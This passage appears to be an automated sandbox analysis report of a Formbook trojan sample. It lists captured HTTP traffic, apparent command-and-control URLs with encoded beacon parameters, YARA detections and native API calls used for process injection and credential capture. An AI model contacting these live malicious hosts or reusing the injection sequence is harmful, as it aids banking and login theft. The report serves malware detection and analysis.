6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 
2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 08 Oct 2024 13:38:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <http://nakama2-sshl.xyz/wp-json/>; rel="https://api.w.org/"Content-Encoding: gzipData Raw: 31 38 63 34 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 5c 7b 93 23 d5 75 ff 7b a7 8a ef d0 68 0c d2 10 b5 5a ad c7 bc 56 33 ce f2 72 a8 c2 40 60 89 8b 2c 5b 53 ad 56 4b ea d9 56 b7 dc dd 9a 07 cb 56 ed cc 60 17 60 1c b0 0d 26 04 c7 b1 89 0d 6b b0 89 09 54 8a 00 09 df 25 cd ec b2 7f e5 2b e4 77 ee bd dd ea 6e b5 46 1a 69 96 24 55 4c ed ce 48 f7 71 5e f7 9c 73 cf 3d 7d 6e 37 ee 7e f0 f1 07 2e 3e f3 c4 43 52 d7 ef 59 9b 0b 8d bb 65 f9 92 d9 96 2c 5f 7a e4 21 69 e5 32 5a a8 43 d2 2d cd f3 36 72 a6 b1 9c 93 2c cd ee 6c e4 b6 b5 dc a6 d4 b8 fb 92 61 b7 cc f6 65 59 1e ce cd 9c b8 32 d5 bc d5 51 84 93 e7 75 18 ad 98 4a c4 87 04 47 44 86 a4 e7 36 17 ce d1 80 04 c9 e7 1a 5d 43 6b 49 7d d7 68 9b 7b 1b 39 a7 b3 0e 39 f8 fd 75 45 71 3a fd 52 cf 50 6c 6f 51 6a 37 47 5b 95 76 73 51 d2 5c df d4 2d 23 a3 57 f4 2c 12 d2 73 8d 9e e1 6b 92 de d5 5c cf f0 37 72 4f 5f 7c 58 5e cd 49 c3 1e 5b eb 19 1b b9 1d d3 d8 ed 3b ae 9f 93 74 c7 f6 0d 1b 23 77 cd 96 df dd 68 19 3b a6 6e c8 ec 4b d1 b4 4d df d4 2c d9 d3 35 cb d8 50 4b e5 e2 c0 33 5c f6 55 6b a2 c5 76 8a 21 20 b9 6d fa 1b ba b3 63 b8 31 2a 38 ae b6 e3 f6 34 5f 6e 19 be a1 fb a6 63 c7 70 fa 86 65 f4 bb 8e 4d a0 38 91 e0 00 3f 9c 09 3e dd 75 9a 8e ef c5 26 d9 8e 69 b7 8c bd 62 db b1 2c 67 97 a1 23 be 2d d3 be 22 b9 86 b5 91 d3 2c df 70 6d cd 37 72 92 bf df 07 b7 5a bf 6f 99 ba 46 c8 15 d7 f3 fe 62 af 67 a1 cb f4 c1 42 ee d6 fb 07 b7 de fa ec e6 f5 f7 6e bf fd cf 5f 1f 7c 22 3d f9 d4 53 d2 c3 86 d1 ca 49 5d ac d3 46 4e ac 90 ad 5d d1 7a 5a 45 f6 bc ae 55 da db 7f 4e 69 b3 31 0a 13 ec 10 75 df b4 3b 4d 4d bf 32 69 36 28 70 fb 7a a9 df 
ed 8b b5 49 58 c2 1a 14 13 1c 79 ba 6b f6 7d c9 73 f5 f1 64 ec f6 65 b1 82 8a df 35 7a 86 a7 68 ed 36 88 30 dc ba b2 ed 29 64 4e 75 af 6b ee 94 b6 bd dc 66 43 e1 20 19 f4 b8 31 a5 64 9e e7 32 cf 47 ca 91 ef 69 7b b2 d9 d3 3a 86 0c ed a5 35 5f b7 34 b7 63 e4 25 08 a0 c1 24 b9 59 2b d7 24 39 25 cd 86 c2 fb 16 86 ab 93 6f d9 1e 01 69 1b be de cd 73 21 e7 15 25 2d 5f 0e 39 12 ec 98 59 da b6 b6 57 ea 38 4e c7 32 b4 be e9 95 74 a7 97 9e e8 f9 fb 96 e1 75 0d c3 cf 4b 66 6b 23 0f 81 35 2d 47 bf 22 5b 66 d3 d5 dc 7d 59 f7 bc bc 24 e8 18 b7 d8 98 64 da ba 35 68 41 be 18 af b4 4c cf 57 12 60 14 86 a7 d4 33 ed 12 06 7c 17 76 b0 51 2f ad 95 aa 79 ae 82 79 df d8 f3 69 6a 5e ea 19 2d 53 db c8 6b 96 c5 49 65 13 19 69 1d cb 69 92 b5 31 8a 81 10 dc 1b 9c 3c a6 c6 43 18 9b 0b 4d a7 b5 7f 55 96 41 17 c9 12 96 2e 43 0d 2c c7 95 c1 1c d4 6f 5d 5a 2c b3 9f f3 99 63 f4 7d cd c6 c0 81 e9 75 e5 8e ab ed 63 b8 d6 6c ae ea d5 ec e1 bb 5d d3 87 df 59 6c b3 9f ec 31 7d 78 08 19 da 4f a8 db 2b ab 2d 6d 25 7b dc 8e b9 63 Data Ascii: 18c4
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 08 Oct 2024 13:38:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://nakama2-sshl.xyz/wp-json/>; rel="https://api.w.org/" Content-Encoding: gzip (gzip-compressed body omitted)
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 08 Oct 2024 13:39:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://nakama2-sshl.xyz/wp-json/>; rel="https://api.w.org/" Content-Encoding: gzip (gzip-compressed body omitted)
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 08 Oct 2024 13:39:10 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 08 Oct 2024 13:39:13 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 08 Oct 2024 13:39:15 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 08 Oct 2024 13:39:18 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 08 Oct 2024 13:39:41 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 08 Oct 2024 13:39:43 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 08 Oct 2024 13:39:46 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 08 Oct 2024 13:39:46 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Tue, 08 Oct 2024 13:39:48 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found content-encoding: gzip content-type: text/html date: Tue, 08 Oct 2024 13:39:55 GMT etag: W/"66fe0220-2b5" server: nginx vary: Accept-Encoding content-length: 454 connection: close (gzip-compressed body omitted)
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found content-encoding: gzip content-type: text/html date: Tue, 08 Oct 2024 13:39:58 GMT etag: W/"66fe0220-2b5" server: nginx vary: Accept-Encoding content-length: 454 connection: close (gzip-compressed body omitted)
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found content-encoding: gzip content-type: text/html date: Tue, 08 Oct 2024 13:40:00 GMT etag: W/"66fe0220-2b5" server: nginx vary: Accept-Encoding content-length: 454 connection: close (gzip-compressed body omitted)
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found content-type: text/html date: Tue, 08 Oct 2024 13:40:03 GMT etag: W/"66fe0220-2b5" server: nginx vary: Accept-Encoding content-length: 693 connection: close Data Ascii: <!DOCTYPE html><html lang="ja"><head> <title></title> <meta http-equiv="content-type" content="text/html; charset=euc-jp" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="/css/error.css"></head><body><div class="p-error"> <img src="/img/error/error.png" alt="" class="p-error__image"> <div class="p-error__message"> <p> <br> 30 </p> <p> <a href="/">TOP</a> </p> </div></div><script> setTimeout("redirect()", 30000); function redirect(){ location.href="/"; }</script></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 08 Oct 2024 13:40:24 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 08 Oct 2024 13:40:27 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 08 Oct 2024 13:40:29 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Tue, 08 Oct 2024 13:40:32 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 08 Oct 2024 13:40:38 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://mommymode.site/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade Vary: Accept-Encoding Content-Encoding: gzip host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Newfold-Cache-Level: 2 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Content-Length: 12947 Content-Type: text/html; charset=UTF-8 (gzip-compressed body omitted)
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 08 Oct 2024 13:40:40 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://mommymode.site/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade Vary: Accept-Encoding Content-Encoding: gzip host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Newfold-Cache-Level: 2 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Content-Length: 12947 Content-Type: text/html; charset=UTF-8 (gzip-compressed body omitted)
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Tue, 08 Oct 2024 13:40:43 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://mommymode.site/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade Vary: Accept-Encoding Content-Encoding: gzip host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Newfold-Cache-Level: 2 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Content-Length: 12947 Content-Type: text/html; charset=UTF-8 (gzip-compressed body omitted)
            Source: RmClient.exe, 00000005.00000002.4591201110.0000000004ADC000.00000004.10000000.00040000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000002.4590179288.000000000498C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://mommymode.site/hya5/?ntHx=DVDDWR70P4Ux&nV=kBImd3s/QyLjHyq4SLIoEPo9gYVaCCo4aEwkxNbGH3XUM96sRoR
            Source: RmClient.exe, 00000005.00000002.4591201110.0000000003FDE000.00000004.10000000.00040000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000002.4590179288.0000000003E8E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://nakama2-sshl.xyz/ui3j/?nV=Ezegw1wupX22aLPkoEEv7/ZO5DjzGXXdsNrfcd
            Source: RmClient.exe, 00000005.00000002.4591201110.0000000003804000.00000004.10000000.00040000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000002.4590179288.00000000036B4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2664524956.0000000000AC4000.00000004.80000000.00040000.00000000.sdmp | String found in binary or memory: http://newdaydawning.net/7mju/?ntHx=DVDDWR70P4Ux&nV=n/a1XNlERIMSMkzeywaNMrPIuUD1rrysoFUi8ENskqLMFqSk
            Source: avmjQSNkeFbUoa.exe, 00000006.00000002.4591962813.000000000575F000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.polarmuseum.info
            Source: avmjQSNkeFbUoa.exe, 00000006.00000002.4591962813.000000000575F000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.polarmuseum.info/nuqv/
            Source: RmClient.exe, 00000005.00000002.4593250214.00000000078CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: RmClient.exe, 00000005.00000002.4593250214.00000000078CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: RmClient.exe, 00000005.00000002.4593250214.00000000078CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: RmClient.exe, 00000005.00000002.4593250214.00000000078CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: RmClient.exe, 00000005.00000002.4593250214.00000000078CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: RmClient.exe, 00000005.00000002.4593250214.00000000078CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: RmClient.exe, 00000005.00000002.4593250214.00000000078CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: RmClient.exe, 00000005.00000002.4591201110.0000000003B28000.00000004.10000000.00040000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000002.4590179288.00000000039D8000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com/css?family=Open
            Source: RmClient.exe, 00000005.00000002.4588947900.00000000009B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: RmClient.exe, 00000005.00000002.4588947900.00000000009B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: RmClient.exe, 00000005.00000002.4588947900.000000000098A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desdL
            Source: RmClient.exe, 00000005.00000002.4588947900.00000000009B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: RmClient.exe, 00000005.00000002.4588947900.000000000098A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: RmClient.exe, 00000005.00000002.4588947900.00000000009B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: RmClient.exe, 00000005.00000002.4588947900.00000000009B4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: RmClient.exe, 00000005.00000003.2554231384.00000000078A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: RmClient.exe, 00000005.00000002.4593250214.00000000078CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
            Source: RmClient.exe, 00000005.00000002.4591201110.0000000004C6E000.00000004.10000000.00040000.00000000.sdmp, RmClient.exe, 00000005.00000002.4593050924.0000000005E00000.00000004.00000800.00020000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000002.4590179288.0000000004B1E000.00000004.00000001.00040000.00000000.sdmp | String found in binary or memory: https://www.google.com
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, | 0_2_0045A10F
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, | 0_2_0045A10F
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard, | 0_2_0046DC80
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput, | 0_2_0044C37A
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, | 0_2_0047C81C

            E-Banking Fraud

            barindex
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000005.00000002.4588417399.0000000000680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2376344718.0000000005AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.4589939639.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2375723470.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.2374576384.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4590169358.0000000000B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4590296108.0000000000BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4588417399.0000000000680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2376344718.0000000005AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4589939639.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2375723470.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2374576384.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4590169358.0000000000B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.4590296108.0000000000BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042C433 NtClose, | 2_2_0042C433
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672B60 NtClose,LdrInitializeThunk, | 2_2_03672B60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk, | 2_2_03672DF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672C70 NtFreeVirtualMemory,LdrInitializeThunk, | 2_2_03672C70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036735C0 NtCreateMutant,LdrInitializeThunk, | 2_2_036735C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03674340 NtSetContextThread, | 2_2_03674340
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03674650 NtSuspendThread, | 2_2_03674650
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672BE0 NtQueryValueKey, | 2_2_03672BE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672BF0 NtAllocateVirtualMemory, | 2_2_03672BF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672BA0 NtEnumerateValueKey, | 2_2_03672BA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672B80 NtQueryInformationFile, | 2_2_03672B80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672AF0 NtWriteFile, | 2_2_03672AF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672AD0 NtReadFile, | 2_2_03672AD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672AB0 NtWaitForSingleObject, | 2_2_03672AB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672F60 NtCreateProcessEx, | 2_2_03672F60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672F30 NtCreateSection, | 2_2_03672F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672FE0 NtCreateFile, | 2_2_03672FE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672FA0 NtQuerySection, | 2_2_03672FA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672FB0 NtResumeThread, | 2_2_03672FB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672F90 NtProtectVirtualMemory, | 2_2_03672F90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672E30 NtWriteVirtualMemory, | 2_2_03672E30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672EE0 NtQueueApcThread, | 2_2_03672EE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672EA0 NtAdjustPrivilegesToken, | 2_2_03672EA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672E80 NtReadVirtualMemory, | 2_2_03672E80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672D30 NtUnmapViewOfSection, | 2_2_03672D30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672D00 NtSetInformationFile, | 2_2_03672D00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672D10 NtMapViewOfSection, | 2_2_03672D10
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672DD0 NtDelayExecution, | 2_2_03672DD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672DB0 NtEnumerateKey, | 2_2_03672DB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672C60 NtCreateKey, | 2_2_03672C60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672C00 NtQueryInformationProcess, | 2_2_03672C00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672CF0 NtOpenProcess, | 2_2_03672CF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672CC0 NtQueryVirtualMemory, | 2_2_03672CC0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03672CA0 NtQueryInformationToken, | 2_2_03672CA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03673010 NtOpenDirectoryObject, | 2_2_03673010
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03673090 NtSetValueKey, | 2_2_03673090
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036739B0 NtGetContextThread, | 2_2_036739B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03673D70 NtOpenThread, | 2_2_03673D70
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03673D10 NtOpenProcessToken, | 2_2_03673D10
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E64340 NtSetContextThread,LdrInitializeThunk, | 5_2_02E64340
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E64650 NtSuspendThread,LdrInitializeThunk, | 5_2_02E64650
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E62AF0 NtWriteFile,LdrInitializeThunk, | 5_2_02E62AF0
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E62AD0 NtReadFile,LdrInitializeThunk, | 5_2_02E62AD0
